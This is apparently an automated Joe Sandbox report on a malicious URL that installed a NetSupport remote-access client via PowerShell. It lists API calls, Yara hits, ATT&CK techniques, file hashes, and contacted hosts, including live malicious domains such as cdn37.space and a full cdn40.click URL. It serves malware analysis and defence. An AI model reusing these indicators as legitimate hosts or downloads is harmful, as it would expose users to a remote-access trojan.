                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1101D160 __time64,SetRect,GetLocalTime
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_11171199 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent
Source: powershell.exe, 0000001A.00000002.2194762703.0000023179892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError
Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_6BEBA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange
Source: Yara match. File source: 32.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match. File source: 32.2.client32.exe.6c1b0000.4.unpack, type: UNPACKEDPE
Source: Yara match. File source: 32.2.client32.exe.74670000.5.unpack, type: UNPACKEDPE
Source: Yara match. File source: 26.2.powershell.exe.23162f37328.2.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 26.2.powershell.exe.23162f2d0d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 26.2.powershell.exe.2316336ecf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 32.2.client32.exe.6beb0000.2.unpack, type: UNPACKEDPE
Source: Yara match. File source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match. File source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR
Source: Yara match. File source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
Source: Yara match. File source: C:\ProgramData\netsupport\client\PCICHEK.DLL, type: DROPPED
Source: Yara match. File source: C:\ProgramData\netsupport\client\pcicapi.dll, type: DROPPED
Source: Yara match. File source: C:\ProgramData\netsupport\client\client32.exe, type: DROPPED
Source: Yara match. File source: C:\ProgramData\netsupport\client\HTCTL32.DLL, type: DROPPED
Source: Yara match. File source: C:\ProgramData\netsupport\client\AudioCapture.dll, type: DROPPED
Source: Yara match. File source: C:\ProgramData\netsupport\client\TCCTL32.DLL, type: DROPPED
Source: Yara match. File source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Windows Management Instrumentation (12) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | Input Capture (1) | System Time Discovery (12) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Native API (4) | Valid Accounts (2) | Valid Accounts (2) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Screen Capture (1) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Defacement (1)
Email Addresses | DNS Server | Domain Accounts | Service Execution (2) | Windows Service (1) | Access Token Manipulation (21) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Input Capture (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | PowerShell (1) | Registry Run Keys / Startup Folder (1) | Windows Service (1) | Software Packing (11) | NTDS | System Information Discovery (34) | Distributed Component Object Model | Clipboard Data (3) | Application Layer Protocol (5) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (123) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (271) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (1) | Masquerading (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (123) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Rundll32 (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph. ID: 1431705, URL: http://wsj.pm, Startdate: 25/04/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
http://wsj.pm | 0% | Avira URL Cloud | safe |
http://wsj.pm | 1% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\ProgramData\netsupport\client\AudioCapture.dll | 1% | Virustotal | | Browse
C:\ProgramData\netsupport\client\AudioCapture.dll | 3% | ReversingLabs | |
C:\ProgramData\netsupport\client\HTCTL32.DLL | 3% | ReversingLabs | |
C:\ProgramData\netsupport\client\HTCTL32.DLL | 3% | Virustotal | | Browse
C:\ProgramData\netsupport\client\PCICHEK.DLL | 3% | ReversingLabs | |
C:\ProgramData\netsupport\client\PCICHEK.DLL | 1% | Virustotal | | Browse
C:\ProgramData\netsupport\client\PCICL32.DLL | 4% | ReversingLabs | |
C:\ProgramData\netsupport\client\PCICL32.DLL | 8% | Virustotal | | Browse
C:\ProgramData\netsupport\client\TCCTL32.DLL | 3% | ReversingLabs | |
C:\ProgramData\netsupport\client\TCCTL32.DLL | 1% | Virustotal | | Browse
C:\ProgramData\netsupport\client\client32.exe | 0% | ReversingLabs | |
C:\ProgramData\netsupport\client\client32.exe | 0% | Virustotal | | Browse
C:\ProgramData\netsupport\client\msvcr100.dll | 0% | ReversingLabs | |
C:\ProgramData\netsupport\client\msvcr100.dll | 0% | Virustotal | | Browse
C:\ProgramData\netsupport\client\pcicapi.dll | 3% | ReversingLabs | |
C:\ProgramData\netsupport\client\pcicapi.dll | 3% | Virustotal | | Browse
C:\ProgramData\netsupport\client\remcmdstub.exe | 8% | ReversingLabs | |
C:\ProgramData\netsupport\client\remcmdstub.exe | 3% | Virustotal | | Browse
                                    No Antivirus matches
Source | Detection | Scanner | Label | Link
cdn37.space | 0% | Virustotal | | Browse
wsj.pm | 1% | Virustotal | | Browse
cdn40.click | 5% | Virustotal | | Browse
                                    SourceDetectionScannerLabelLink
Name                        IP               Active  Malicious  Antivirus Detection  Reputation
geo.netsupportsoftware.com  104.26.0.231     true    false                           high
cdn40.click                 23.133.88.190    true    false                           unknown
api.ipify.org               104.26.12.205    true    false                           high
www.google.com              108.177.122.106  true    false                           high
cdn37.space                 86.104.72.157    true    true                            unknown
wsj.pm                      103.113.70.37    true    false                           unknown
Name  Malicious  Antivirus Detection  Reputation
Name  Source  Malicious  Antivirus Detection  Reputation
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://web.ncdc.gov.sa/crl/nrcaparta1.crlAppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.datev.de/zertifikat-policy-int0AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.acabogacia.org0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.firmaprofesional.com/cps0AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://aka.ms/pscore6powershell.exe, 00000029.00000002.2535977313.000002678C620000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e01powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • 2%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://crl.securetrust.com/SGCA.crl0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.agesic.gub.uy/acrn/acrn.crl0)AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://pesterbdd.com/images/Pester.png8powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • 12%, Virustotal, Browse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://www.rcsc.lt/repository0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://web.certicamara.com/marco-legal0ZAppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drfalse
                                                                                                high
                                                                                                http://www.quovadisglobal.com/cps0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.correo.com.uy/correocert/cps.pdf0AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drfalse
                                                                                                    high
                                                                                                    http://certs.oaticerts.com/repository/OATICA2.crt08AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://cps.chambersign.org/cps/chambersignroot.html0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.anf.es/AC/RC/ocsp0cAppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.pci.co.uk/supportclient32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.oaticerts.com/repository.AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.ancert.com/cps0AppInstaller.exe, 0000000E.00000002.1776317770.00000196D6200000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://ocsp.accv.es0AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://www.wsj.com/xpowershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.echoworx.com/ca/root2/cps.pdf0AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.datev.de/zertifikat-policy-std0AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.wsj.com/vicepowershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://aka.ms/winsvr-2022-pshelp(powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://crl.defence.gov.au/pki0AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.agesic.gub.uy/acrn/cps_acrn.pdf0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
5.8.63.140 | unknown | Russian Federation | 30475 | WEHOSTWEBSITES-COMUS | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
86.104.72.157 | cdn37.space | Romania | 50636 | TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO | true
185.174.102.62 | unknown | Ukraine | 8100 | ASN-QUADRANET-GLOBALUS | false
108.177.122.106 | www.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
103.113.70.37 | wsj.pm | India | 133973 | NETCONNECTWIFI-ASNetConnectWifiPvtLtdIN | false
104.26.13.205 | unknown | United States | 13335 | CLOUDFLARENETUS | false
23.133.88.190 | cdn40.click | Reserved | 394352 | FASTNET-COMMUNICATIONSCA | false
104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                IP
                                                                                                                192.168.2.17
                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                Analysis ID:1431705
                                                                                                                Start date and time:2024-04-25 16:57:45 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 10m 48s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                Sample URL:http://wsj.pm
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:44
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.rans.evad.win@48/139@21/11
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 66.7%
                                                                                                                HCA Information:Failed
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 64.233.185.94, 108.177.122.139, 108.177.122.100, 108.177.122.101, 108.177.122.113, 108.177.122.102, 108.177.122.138, 108.177.122.84, 34.104.35.123, 64.233.177.95, 74.125.136.95, 142.250.105.95, 64.233.176.95, 142.250.9.95, 172.253.124.95, 172.217.215.95, 64.233.185.95, 142.251.15.95, 108.177.122.95, 74.125.138.95, 173.194.219.95, 142.250.105.94, 104.18.20.226, 64.233.176.113, 64.233.176.138, 64.233.176.100, 64.233.176.101, 64.233.176.102, 64.233.176.139
                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ocsp.globalsign.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, login.live.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com
                                                                                                                • Execution Graph export aborted for target PsfLauncher64.exe, PID 720 because it is empty
                                                                                                                • Execution Graph export aborted for target PsfRunDll64.exe, PID 1160 because it is empty
                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
16:59:27 | API Interceptor | 152x Sleep call for process: powershell.exe modified
17:00:15 | API Interceptor | 11x Sleep call for process: client32.exe modified
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):93560
                                                                                                                Entropy (8bit):6.5461580255883876
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\AudioCapture.dll, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):328056
                                                                                                                Entropy (8bit):6.754723001562745
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\HTCTL32.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                Reputation:low
